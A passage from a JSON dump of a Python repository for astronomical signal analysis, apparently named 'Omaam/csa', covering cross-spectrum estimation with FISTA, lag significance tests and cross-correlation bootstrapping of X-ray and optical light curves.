y2_rec = istcs(X, data1, data2, freqinfo,\n tperseg, toverlap,\n basewidth=basewidth_triang)\n data1_lag, data2_lag = istcs(X_lag, data1, data2, freqinfo,\n tperseg, toverlap,\n basewidth=basewidth_triang)\n data1_rem, data2_rem = istcs(X_rem, data1, data2, freqinfo,\n tperseg, toverlap,\n basewidth=basewidth_triang)\n\n # figure\n fig, ax = plt.subplots(2, sharex=True)\n ax[0].plot(data2[:,0], data2[:,1],\n y2_rec[:,0], y2_rec[:,1],\n data2_lag[:,0], data2_lag[:,1],\n data2_rem[:,0], data2_rem[:,1],)\n ax[0].set_ylabel('Optical flux')\n ax[0].legend(['original', 'istcs', 'lag', 'rem'])\n ax[1].plot(data1[:,0], data1[:,1],\n y1_rec[:,0], y1_rec[:,1],\n data1_lag[:,0], data1_lag[:,1],\n data1_rem[:,0], data1_rem[:,1],)\n ax[1].set_ylabel('X-ray flux')\n ax[1].set_xlabel('Time')\n fig.savefig('lc_ncf_noavesub.png')\n if FIGSHOW:\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5385218262672424,
"alphanum_fraction": 0.5573256611824036,
"avg_line_length": 29.631999969482422,
"blob_id": "5d0c4a2c42764a30326a148c72d7eb177ffb4d9e",
"content_id": "368e87ccac020ec2b35011e766d7fd8dc0307b1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7658,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 250,
"path": "/csa/xhandler.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\nfrom csa.signiftest import LagSignifTest\nfrom csa.tools import phist\n\n\n__all__ = ['signiftest', 'query_forX']\n\n\ndef _get_freq(freqinfo):\n freq_edge = np.linspace(freqinfo[0],\n freqinfo[1],\n int(freqinfo[2] + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\n\ndef _limit_phase(phase_diff):\n if phase_diff < -np.pi: # phase_lag > pi\n phase_diff_out = 2*np.pi + phase_diff\n elif phase_diff >= np.pi:\n phase_diff_out = -2*np.pi + phase_diff\n else:\n phase_diff_out = phase_diff\n return phase_diff_out\n\n\ndef _make_summary(x, freqinfo, anti=False):\n\n # x\n x_data = x.reshape(4, int(freqinfo[2])).T\n df_x = pd.DataFrame(x_data, columns=['a', 'b', 'c', 'd'])\n\n # freq\n df_x['freq'] = _get_freq(freqinfo)\n df_x['period'] = 1 / df_x.freq.values\n\n # norm\n df_x['norm1'] = np.sqrt(df_x.a.values**2 + df_x.b.values**2)\n df_x['norm2'] = np.sqrt(df_x.c.values**2 + df_x.d.values**2)\n df_x['norm12'] = np.sqrt(df_x.norm1.values**2 + df_x.norm2.values**2)\n\n # lag\n df_x['alpha1'] = np.arctan2(df_x.b[df_x.a != 0], df_x.a[df_x.a != 0])\n df_x['alpha2'] = np.arctan2(df_x.d[df_x.c != 0], df_x.c[df_x.c != 0])\n df_x.fillna(0, inplace=True)\n delta_alpha = list(map(_limit_phase, df_x.alpha2 - df_x.alpha1))\n df_x['lag'] = delta_alpha / (2 * np.pi * df_x.freq.values)\n\n # summary\n df_sum = df_x[['lag', 'norm12', 'norm1', 'norm2',\n 'period', 'freq']][df_x.norm12 > 0]\n if anti:\n df_sum = _make_antisum(df_sum)\n\n return df_sum\n\n\ndef _make_periodicsum(x, freqinfo, lagrange):\n # load df_sum\n df_sum = _make_summary(x, freqinfo)\n n_ori = df_sum.shape[0]\n\n # duplicate periodical counterparts\n sumdata = df_sum.values\n for row in df_sum.itertuples(index=False):\n # get periodical lag\n lagdup_plus = np.arange(row.lag, lagrange[1], row.period)\n lagdup_minu = -np.arange(-row.lag, np.abs(lagrange[0]), row.period)\n lagdup = np.unique(np.hstack([lagdup_plus, lagdup_minu, row.lag]))\n\n # append to sumdata\n sumdata_dup = np.tile(row, (len(lagdup), 1))\n sumdata_dup[:, 0] = lagdup\n sumdata = np.append(sumdata, sumdata_dup, axis=0)\n\n # recreate df_sum for output\n df_sum_out = pd.DataFrame(sumdata[n_ori:], columns=df_sum.columns)\n return df_sum_out\n\n\ndef _make_periodicsumold(x, freqinfo, peridicrange):\n df_sum = _make_summary(x, freqinfo)\n columns = df_sum.columns.values\n ndarray_sum = df_sum.values\n for para in list(ndarray_sum):\n (lag, norm12, norm1, norm2, period, freq) = para\n # plus\n i = 0\n lag_peri = lag\n while peridicrange[0] < lag + (i*period) <= peridicrange[1]:\n lag_peri = lag + (i*period)\n new_col = np.array([lag_peri, norm12, norm1,\n norm2, period, freq])\n ndarray_sum = np.vstack([ndarray_sum, new_col])\n i += 1\n # munus\n i = -1\n lag_peri = lag - period\n # while lag_peri > peridicrange[0]:\n while peridicrange[0] < lag + (i*period) <= peridicrange[1]:\n lag_peri = lag + (i*period)\n new_col = np.array([lag_peri, norm12, norm1,\n norm2, period, freq])\n ndarray_sum = np.vstack([ndarray_sum, new_col])\n i += -1\n df_sum_out = pd.DataFrame(ndarray_sum, columns=columns)\n return df_sum_out\n\n\ndef _search_index(a, v):\n idx_out = []\n for vv in v:\n idx_match = int(np.where(a == vv)[0])\n idx_out.append(idx_match)\n return np.array(idx_out)\n\n\ndef _make_antisum(df_sum):\n df_sum_out = df_sum.copy()\n df_sum_out.loc[:, 'lag'] = list(map(\n lambda lag, peri: lag - peri/2 if lag >= 0 else lag + peri/2,\n df_sum_out['lag'], df_sum_out['period']))\n return df_sum_out\n\n\n# main functions\n\ndef query_forX(X, freqinfo, para, pararanges,\n mode='ext', anti=False, periodic=False):\n\n '''\n '''\n X_out = _adjuster_forX(_query_forX, X, freqinfo, para, pararanges,\n mode=mode, anti=anti, periodic=periodic)\n return X_out\n\n\ndef _query_forX(x, freqinfo, para, pararanges,\n mode='ext', anti=False, periodic=False):\n\n # get basic quantity\n df_sum = _make_summary(x, freqinfo, anti=anti)\n if periodic:\n periodicrange = np.quantile(df_sum.lag, [0.01, 0.99])\n df_sum = _make_periodicsum(x, freqinfo, periodicrange)\n freqs = _get_freq(freqinfo)\n pararanges = np.array(pararanges)\n\n # make the shape of pararanges (:,2) even if\n # the original shape is (:, 1)\n if isinstance(pararanges[0], np.ndarray) is False:\n pararanges = [pararanges]\n\n # if para = 'ratio', then make ratio\n if para == 'ratio':\n df_sum['ratio'] = list(map(lambda n1, n2: n1/n2 if n1 < n2 else n2/n1,\n df_sum.norm1, df_sum.norm2))\n\n # search lag components and put 0\n flags = np.zeros(freqs.shape[0])\n for pararange in pararanges:\n freq_quer = df_sum.query(\n f'{pararange[0]} <= {para} < {pararange[1]}').freq\n idx_quer = _search_index(freqs, freq_quer)\n if idx_quer.size != 0:\n flags[idx_quer] = 1\n\n # reverse if 'cut' mode\n if 'cut' in mode:\n flags = 1 - flags\n\n # extract x where flag == 1\n x_out = x * np.tile(flags, 4)\n return x_out\n\n\ndef signiftest(X, freqinfo, testrange, lagbinwidth=1,\n iteration=1000, ci=0.9, periodic=False,\n anti=False):\n '''\n '''\n X_out = _adjuster_forX(_signiftest, X, freqinfo, testrange,\n lagbinwidth=lagbinwidth,\n iteration=iteration, ci=ci,\n periodic=periodic, anti=anti)\n return X_out\n\n\ndef _signiftest(x, freqinfo, testrange, lagbinwidth=1,\n iteration=1000, ci=0.9, periodic=False,\n anti=False):\n\n df_sum = _make_summary(x, freqinfo, anti=anti)\n tester = LagSignifTest(df_sum, lagrange=testrange,\n lag_binwidth=lagbinwidth)\n tester.make_model(iteration=iteration)\n signifrange = tester.get_signifrange(ci=ci)\n x_signif = query_forX(x, freqinfo, para='lag',\n pararanges=signifrange,\n periodic=periodic)\n return x_signif\n\n\ndef subtractX(X_minuend, X_subtrahend):\n X_mask = np.where(X_subtrahend == 0, 1, 0)\n X_diff = X_minuend * X_mask\n return X_diff\n\n\ndef addX(*X_addends):\n X_sum = X_addends[0].copy()\n for X_addend in X_addends[1:]:\n cond_nonzero = (X_addend != 0)\n X_sum[cond_nonzero] += X_addend[cond_nonzero]\n return X_sum\n\n\ndef _adjuster_forX(func, X, *args, **kargs):\n '''Adjuster for a X.\n By using this, it is possible to use\n functions without taking care of the\n shape of the X.\n '''\n # for cs\n if len(X.shape) == 1:\n X_out = func(X, *args, **kargs)\n # for stcs\n elif len(X.shape) == 2:\n X_out = X.copy()\n for i, x in enumerate(X.T):\n X_out[:, i] = func(x, *args, **kargs)\n return X_out\n\n\ndef main():\n freqinfo = [0, 0.5, 2000]\n X = np.loadtxt('../example/X.dat')\n lags, powsums = phist(X, freqinfo, lagrange=[-10, 10])\n\n x_cut = query_forX(X, freqinfo, 'lag', [-2, 2], 'cut', periodic=True)\n testrange = [-10, 10]\n x_signif = signiftest(x_cut, freqinfo, testrange, iteration=100,\n periodic=True)\n print(x_signif)\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7692307829856873,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 25,
"blob_id": "1c4ff1de73a7b9c7c0ee84db46fed76fef3bb4c3",
"content_id": "01426c7fd747610135a31e80ada940465fcbddb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 26,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 1,
"path": "/csa/__init__.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "from . import make_matrix\n"
},
{
"alpha_fraction": 0.5296989679336548,
"alphanum_fraction": 0.553702175617218,
"avg_line_length": 26.010988235473633,
"blob_id": "3c2b6b7f8de23ef2be34e0aa18eda3733773d01e",
"content_id": "7bd6d7a8d0238485c9f42b57eac145a9520ed35c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2458,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 91,
"path": "/example/bootstrap/ccfbootstrap.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import os\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import zscore\nfrom scipy import signal\nfrom tqdm import tqdm, trange\n\n# decorators\n\ndef stopwatch(func):\n def wrapper(*arg, **kargs):\n start = time.time()\n print(f'start {func.__name__}')\n res = func(*arg, **kargs)\n dura = (time.time() - start)\n print(time.strftime(f'finish {func.__name__}: %H:%M\\'%S\\\"',\n time.gmtime(dura)))\n return res\n return wrapper\n\n\ndef change_directory(path_to_dir):\n def _change_directory(func):\n def wrapper(*args, **kargs):\n current_dir = os.getcwd()\n if os.path.exists(path_to_dir) is False:\n os.makedirs(path_to_dir)\n os.chdir(path_to_dir)\n results = func(*args, **kargs)\n os.chdir(current_dir)\n return(results)\n return wrapper\n return _change_directory\n\n\ndef ccf(x, y, fs=1, maxlags=None):\n # standardized\n x, y = zscore(x), zscore(y)\n\n # calcurate correlation and lags\n n_x, n_y = len(x), len(y)\n T = max(n_x, n_y)\n r = signal.correlate(y, x, mode='full') / T\n lags = np.arange(-n_x + 1, n_y) / fs\n\n # query\n maxlags = 2 * T - 1 if maxlags is None else maxlags\n lag_out = lags[((-maxlags <= lags) & (lags <= maxlags))]\n r_out = r[((-maxlags <= lags) & (lags <= maxlags))]\n return lag_out, r_out\n\n\ndef ccfbootstrap(Y1, Y2, fs=1, q=(0.025, 0.5, 0.975), maxlags=None):\n\n # check whether the shapes of Y1 and Y2 are the same.\n assert Y1.shape == Y2.shape, \\\n f'the sizes of Y1 and Y2 must be the same: \\\n {Y1.shape} != {Y2.shape}'\n\n # ccf\n C = []\n for i in range(len(Y1)):\n lags, c = ccf(Y1[i], Y2[i], fs=fs, maxlags=maxlags)\n C.append(c)\n C = np.array(C)\n\n # get quantile\n c_low, c_med, c_hig = np.quantile(C, q, axis=0)\n return lags, c_low, c_med, c_hig\n\n\n@change_directory('example')\ndef main():\n data1 = np.loadtxt('xdata.dat')\n data2 = np.loadtxt('odata.dat')\n\n nlc = 10000\n Y1 = np.tile(data1[:,1].T, (nlc, 1))\n Y1 += np.random.normal(0, 2*data1[:,1].std(), Y1.shape)\n Y2 = np.tile(data1[:,1].T, (nlc, 1))\n Y2 += np.random.normal(0, 2*data2[:,1].std(), Y2.shape)\n\n lags, c_low, c_med, c_hig = ccfbootstrap(Y1, Y2)\n plt.fill_between(lags, c_low, c_hig, alpha=.5)\n plt.plot(lags, c_med)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.432534396648407,
"alphanum_fraction": 0.4678206741809845,
"avg_line_length": 27.700637817382812,
"blob_id": "bb67d8b8d875dfab1f4a7b48c1d027dd7acff4bb",
"content_id": "89830ee8e89d7690fbfe77637aac1377002838ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4506,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 157,
"path": "/csa/fista.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\nfrom csa.make_matrix import mkmat_cs, mkmat_cs_w\n\n\ndef soft_thres(a, b, c, d, L, lam):\n ''' Calcurate soft threshold\n '''\n l = np.sqrt(a**2 + b**2 + c**2 + d**2) * L\n ans = 0.0\n if lam < l:\n ans = 1.0 - lam /l\n elif -lam <= l and l <= lam:\n ans = 0.0\n elif l < -lam:\n ans = 1.0 + lam /l\n return ans\n\ndef prox_map(y, L, A_mat, h_vec, lam):\n b = y - 2.0/L * np.dot(A_mat.T, np.dot(A_mat, y) - h_vec)\n N2 = b.shape[0]\n N = N2 / 2\n b_new = np.repeat(0.0, 2 * N)\n for i in range(int(N/2)):\n factor = soft_thres(b[i],\n b[int(i + N/2)],\n b[int(i + N)],\n b[int(i + N/2 * 3)], L, lam)\n b_new[int(i)] = b[int(i)] * factor\n b_new[int(i + N/2)] = b[int(i + N/2)] * factor\n b_new[int(i + N)] = b[int(i + N)] * factor\n b_new[int(i + N/2 * 3)] = b[int(i + N/2 * 3)] * factor\n return b_new\n\ndef g_func(J_vec, lam):\n N2 = J_vec.shape[0]\n N = N2 / 2\n sigsum = 0.0\n for i in range(int(N/2)):\n sigsum = sigsum + np.sqrt(J_vec[int(i + N/2 * 0)]**2 +\n J_vec[int(i + N/2 * 1)]**2 +\n J_vec[int(i + N/2 * 2)]**2 +\n J_vec[int(i + N/2 * 3)]**2)\n ans = lam * sigsum\n return ans\n\ndef f_func(J_vec, A_mat, h_vec):\n vec_tmp = h_vec - np.dot(A_mat, J_vec)\n ans = np.dot(vec_tmp, vec_tmp.T)\n return ans\n\ndef fg_func(J_vec, A_mat, h_vec, lam):\n return f_func(J_vec, A_mat, h_vec) + g_func(J_vec, lam)\n\ndef diff_func(y, A_mat, h_vec):\n return 2 * np.dot(A_mat.T, np.dot(A_mat, y) - h_vec)\n\ndef q_func(x, y, L, A_mat, h_vec, lam):\n term1 = f_func(y, A_mat, h_vec)\n term2 = np.sum((x - y) * diff_func(y, A_mat, h_vec))\n term3 = L / 2.0 * np.dot((x - y).T, x - y)\n term4 = g_func(x, lam)\n ans = term1 + term2 + term3 + term4\n return ans\n\ndef find_ik(y, L_pre, eta, A_mat, h_vec, lam):\n ik_max = 1000\n ik = 0\n while ik <= ik_max:\n L = eta**ik * L_pre\n pLy = prox_map(y, L, A_mat, h_vec, lam)\n fgfunc_val = fg_func(pLy, A_mat, h_vec, lam)\n qfunc_val = q_func(pLy, y, L, A_mat, h_vec, lam)\n if fgfunc_val <= qfunc_val:\n break\n ik = ik + 1\n return ik\n\ndef _get_frecvec(freqinfo):\n freq_edge = np.linspace(freqinfo[0],\n freqinfo[1],\n int(freqinfo[2] + 1))\n freq_vec = (freq_edge[:-1] + freq_edge[1:]) / 2\n return freq_vec\n\ndef fista(data1, data2, freqinfo, lam):\n\n # frequency setup\n freq_lo = freqinfo[0]\n freq_up = freqinfo[1]\n nfreq = freqinfo[2]\n delta_freq = (freq_up - freq_lo) / nfreq\n freqdata = _get_frecvec(freqinfo)\n\n # make matrix file\n A_mat = mkmat_cs(data1[:,0], data2[:,0], freqdata)\n A_w_mat = mkmat_cs_w(data1[:,0], data2[:,0], freqdata)\n\n # prepare for estimation\n nrow1 = data1.shape[0]\n nrow2 = data2.shape[0]\n ncol = A_mat.shape[1]\n\n data = np.hstack([data1, data2])\n\n h_vec = np.hstack([data1[:,1] * np.sqrt(nrow2),\n data2[:,1] * np.sqrt(nrow1)])\n\n # estimation\n tolerance = 5.e-8\n eta = 1.2\n x = np.repeat(0.0, ncol)\n x_pre = x\n y = x\n L = 1e-3\n L_pre = L\n k_max = 500\n t = 1\n\n cost = 0.0\n cost_pre = cost\n for k in range(k_max):\n ik = find_ik(y, L_pre, eta, A_w_mat, h_vec, lam)\n L = eta**ik * L_pre\n x = prox_map(y, L, A_w_mat, h_vec, lam)\n t_new = (1. + np.sqrt(1. + 4 * t**2))/2.\n y_new = x + (t - 1.)/ t_new * (x - x_pre)\n x_pre = x\n y = y_new\n t = t_new\n L_pre = L\n\n cost = fg_func(y_new, A_w_mat, h_vec, lam)\n if k > 1 and (cost_pre - cost) / cost < tolerance:\n # print('k: {}'.format(k))\n # print('cost: {}'.format(cost))\n break\n cost_pre = cost\n\n return freqdata, x\n\nif __name__ == '__main__':\n infile1 = 'lc1.dat'\n infile2 = 'lc2.dat'\n freqinfo = [0, 0.5, 200]\n x = fista(infile1, infile2, freqinfo, 1)\n df_x = pd.DataFrame({'a': x[:200],\n 'b': x[200:400],\n 'c': x[400:600],\n 'd': x[600:800]})\n from summary import make_summary\n import matplotlib.pyplot as plt\n df_sum = make_summary(x, freqinfo)\n plt.scatter(df_sum.lag, df_sum.norm12)\n plt.show()\n print(df_sum)\n"
},
{
"alpha_fraction": 0.5825688242912292,
"alphanum_fraction": 0.5894495248794556,
"avg_line_length": 22.567567825317383,
"blob_id": "037a0c75ae8fff83a498199e49732c351c902795",
"content_id": "41662bd5ed7db6de64d5e07357a716169dcb12d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 872,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 37,
"path": "/csa/cvresult.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\n\ndef lambda_fromcvdata(cvdata, mode='min'):\n\n # get index at minmun \n idx_min = cvdata[:,1].argmin()\n\n if mode == 'min':\n return cvdata[idx_min, 0]\n\n elif mode == 'ose':\n\n # MSE + error at minmun MSE\n mse_p_std_min = cvdata[idx_min_data, 1:].sum()\n\n # search the lambda which MSE is close to\n # the MSE + error at the minum.\n idx_ose = np.searchsorted(cvdata[idx_min:], mse_p_std_min)\n return cvdata[idx_min + idx_ose]\n\n\ndef show_cvdata(cvdata, ax=None):\n\n # make ax if None\n if ax is None:\n fig, ax = plt.subplots()\n\n # figure\n ax.errorbar(cvdata[:,0], cvdata[:,1], cvdata[:,2], fmt='o')\n ax.set_xscale('log')\n ax.set_yscale('log')\n ax.set_xlabel(r'$\\lambda$')\n ax.set_ylabel('MSE')\n return ax\n"
},
{
"alpha_fraction": 0.5301645398139954,
"alphanum_fraction": 0.5658135414123535,
"avg_line_length": 27.415584564208984,
"blob_id": "2d4f689608295522205f9412ba62077bae6ef484",
"content_id": "9af52fee91d8697e616d3c7ec4cd3e8b5956f0f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2188,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 77,
"path": "/csa/bootstrap.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import zscore\nfrom scipy import signal\n\nfrom csa.deco import change_directory\n\n\ndef ccf(x, y, fs=1, maxlags=None):\n # standardized\n x, y = zscore(x), zscore(y)\n\n # calcurate correlation and lags\n n_x, n_y = len(x), len(y)\n T = max(n_x, n_y)\n r = signal.correlate(y, x, mode='full') / np.std(x) / np.std(y) / T\n # r = signal.correlate(y, x, mode='full') / T\n lags = np.arange(-n_x + 1, n_y) / fs\n\n # query\n maxlags = 2 * T - 1 if maxlags is None else maxlags\n lag_out = lags[((-maxlags <= lags) & (lags <= maxlags))]\n r_out = r[((-maxlags <= lags) & (lags <= maxlags))]\n return lag_out, r_out\n\n\ndef ccfbootstrap(Y1, Y2, droprate=0.0, fs=1,\n q=(0.025, 0.5, 0.975), maxlags=None):\n\n # check whether the shapes of Y1 and Y2 are the same.\n assert Y1.shape == Y2.shape, \\\n f'the sizes of Y1 and Y2 must be the same: \\\n {Y1.shape} != {Y2.shape}'\n\n # ccf\n C = []\n for i in range(len(Y1)):\n lags, c = ccf(Y1[i], Y2[i], fs=fs, maxlags=maxlags)\n C.append(c)\n C = np.array(C)\n\n # get quantile\n c_low, c_med, c_hig = np.quantile(C, q, axis=0)\n c_lowdev = (c_med - c_low) * np.sqrt(1-droprate)\n c_higdev = (c_med - c_low) * np.sqrt(1-droprate)\n return lags, c_med-c_lowdev, c_med, c_med+c_higdev\n\n\ndef lcbootstrap(Y, droprate=0.0, q=(0.025, 0.5, 0.975)):\n\n # get quantile\n y_low, y_med, y_hig = np.quantile(Y, q, axis=0)\n y_lowdev = (y_med - y_low) * np.sqrt(1-droprate)\n y_higdev = (y_med - y_low) * np.sqrt(1-droprate)\n\n return y_med-y_lowdev, y_med, y_med+y_higdev\n\n\n@change_directory('../example')\ndef main():\n data1 = np.loadtxt('xdata.dat')\n data2 = np.loadtxt('odata.dat')\n\n nlc = 10000\n Y1 = np.tile(data1[:, 1].T, (nlc, 1))\n Y1 += np.random.normal(0, 2*data1[:, 1].std(), Y1.shape)\n Y2 = np.tile(data1[:, 1].T, (nlc, 1))\n Y2 += np.random.normal(0, 2*data2[:, 1].std(), Y2.shape)\n\n lags, c_low, c_med, c_hig = ccfbootstrap(Y1, Y2)\n plt.fill_between(lags, c_low, c_hig, alpha=.5)\n plt.plot(lags, c_med)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7428571581840515,
"alphanum_fraction": 0.7428571581840515,
"avg_line_length": 16.5,
"blob_id": "541e779c5f94587a6c364c2db74fad4c2c952fb0",
"content_id": "5491842be05c3bf7439ad7920e5a889ac9a43a58",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 35,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "# CSA\nCommon Signal Analysis (CSA)\n"
},
{
"alpha_fraction": 0.5298013091087341,
"alphanum_fraction": 0.5761589407920837,
"avg_line_length": 32.03125,
"blob_id": "d7f0830d9e5a18272f6e63cdf2b78a4cd4c29ce2",
"content_id": "66e19cac66d672c6204e3a28068477959807498f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1057,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 32,
"path": "/csa/make_matrix.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\ndef make_matrix(t, f):\n t = np.array([t]).astype(float)\n f = np.array([f]).astype(float)\n phase = 2 * np.pi * np.dot(t.T, f)\n mat = np.hstack([np.cos(phase), np.sin(phase)])\n return mat\n\ndef mkmat_cs(t1, t2, freq_vec):\n delta_f = np.mean(np.diff(freq_vec))\n mat_a1 = 2 * delta_f * make_matrix(t1, freq_vec)\n mat_a2 = 2 * delta_f * make_matrix(t2, freq_vec)\n mat_b1 = np.zeros_like(mat_a2)\n mat_b2 = np.zeros_like(mat_a1)\n mat_1 = np.hstack([mat_a1, mat_b1])\n mat_2 = np.hstack([mat_b2, mat_a2])\n mat = np.vstack([mat_1, mat_2])\n return mat\n\ndef mkmat_cs_w(t1, t2, freq_vec):\n N1 = t1.shape[0]\n N2 = t2.shape[0]\n delta_f = np.mean(np.diff(freq_vec))\n mat_a1 = 2 * delta_f * make_matrix(t1, freq_vec) * np.sqrt(N2)\n mat_a2 = 2 * delta_f * make_matrix(t2, freq_vec) * np.sqrt(N1)\n mat_b1 = np.zeros_like(mat_a2)\n mat_b2 = np.zeros_like(mat_a1)\n mat_1 = np.hstack([mat_a1, mat_b1])\n mat_2 = np.hstack([mat_b2, mat_a2])\n mat = np.vstack([mat_1, mat_2])\n return mat\n"
},
{
"alpha_fraction": 0.5520987510681152,
"alphanum_fraction": 0.5711110830307007,
"avg_line_length": 33.3220329284668,
"blob_id": "9c499e269a0d7bc00b730ba2897b7a8fcb938617",
"content_id": "668aebdf7a8bc3f6e7870dbeebad5856be4d904b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4050,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 118,
"path": "/csa/signiftest.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
"text": "from concurrent.futures import ProcessPoolExecutor\nimport os\n\nimport numpy as np\nimport pandas as pd\n\nncpu = os.cpu_count()\nMAX_WORKERS = ncpu\n# print(f'number of cpu: {ncpu}')\n\n\ndef set_bins(low, hig, binsize):\n low = float(round(low, 10))\n hig = float(round(hig, 10))\n # Get digit\n dig_low = str(low).split(\".\")[1]\n dig_hig = str(hig).split(\".\")[1]\n nd_max = len(dig_low) if len(dig_low) >= len(dig_hig) else len(dig_hig)\n # Float into integer\n low_trans = low * np.power(10, nd_max)\n hig_trans = hig * np.power(10, nd_max)\n binsize_trans = binsize * np.power(10, nd_max)\n # Make bins\n bins = np.arange(low_trans, hig_trans + binsize_trans, binsize_trans)\n # Change digit into original\n bins = bins / np.power(10, nd_max)\n return bins\n\n\ndef _make_model(periods, lagbins):\n lags = np.random.rand(len(periods))*periods - periods/2\n lagdistmodel = pd.cut(lags, bins=lagbins).value_counts().values\n return lagdistmodel\n\n\nclass LagSignifTest:\n\n def __init__(self, df_sum, lagrange=[-0.5, 0.5], lag_binwidth=.1):\n '''\n basic flow is below\n 1. make random sample\n 2. compare sample with model\n '''\n # summary\n self.lag = df_sum['lag'].values\n self.norm12 = df_sum['norm12'].values\n self.norm1 = df_sum['norm1'].values\n self.norm2 = df_sum['norm2'].values\n self.period = df_sum['period'].values\n self.freq = df_sum['freq'].values\n\n # lagrange\n self.lagrange = lagrange\n self.lag_binwidth = lag_binwidth\n\n def make_model(self, iteration=1000):\n '''make rondom model\n '''\n lagbins = set_bins(self.lagrange[0], self.lagrange[1],\n self.lag_binwidth)\n lagdistmodels = np.zeros((iteration, lagbins.shape[0]-1))\n with ProcessPoolExecutor(MAX_WORKERS) as executor:\n futures = [executor.submit(_make_model, periods=self.period,\n lagbins=lagbins)\n for i in range(iteration)]\n for i, future in enumerate(futures):\n lagdistmodels[i] = future.result()\n\n self.lagbins = lagbins\n self.iteration = iteration\n self.n_model_tile = lagdistmodels\n\n def get_signifrange(self, ci=.68, retbins=False, verbose=False):\n ''' get significance lag range\n '''\n lagbins = set_bins(self.lagrange[0], self.lagrange[1],\n self.lag_binwidth)\n laglabel_list = np.array(list(zip(lagbins[:-1], lagbins[1:])))\n n_sample_list = pd.cut(self.lag, bins=lagbins).value_counts().values\n n_atci_list = []\n for i in range(len(self.n_model_tile[0, :])):\n n_atci = np.percentile(self.n_model_tile[:, i], 100*ci)\n n_atci_list.append(n_atci)\n n_atci_list = np.array(n_atci_list)\n lag_ci_list = laglabel_list[n_sample_list >= n_atci_list]\n if verbose:\n print('lag : {}'.format(lagbins))\n print('sample: {}'.format(n_sample_list))\n print('ci {}%: {}'.format(int(ci*100), n_atci_list))\n if retbins:\n return lag_ci_list, lagbins\n else:\n return lag_ci_list\n\n def get_civalue(self, ci):\n ''' get cignificance value\n '''\n n_atci_list = []\n for i in range(len(self.n_model_tile[0, :])):\n n_atci = np.percentile(self.n_model_tile[:, i], 100*ci)\n n_atci_list.append(n_atci)\n n_atci_list = np.array(n_atci_list)\n return self.lagbins, n_atci_list\n\n\nif __name__ == \"__main__\":\n\n df_sum = pd.read_csv(\n 'example/out/sum.dat', sep=' ',\n names=['lag', 'norm12', 'norm1', 'norm2', 'period', 'freq'])\n\n tester = LagSignifTest(df_sum)\n tester.make_model(iteration=1000)\n signif_ci90 = tester.get_signifrange(ci=.9)\n print('signif range: {}'.format(signif_ci90))\n bins, ci90_list = tester.get_civalue(0.90)\n print('bins : {}'.format(bins))\n print('ci 90: {}'.format(ci90_list))\n"
},
{
"alpha_fraction": 0.5326530337333679,
"alphanum_fraction": 0.5887755155563354,
"avg_line_length": 27,
"blob_id": "51bce865d7ca6564bf06ee06b8add004b83ea19a",
"content_id": "83f9f1634857ad4e848088e684a56141b6faf67e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 980,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 35,
"path": "/example/example.py",
"repo_name": "Omaam/csa",
"src_encoding": "UTF-8",
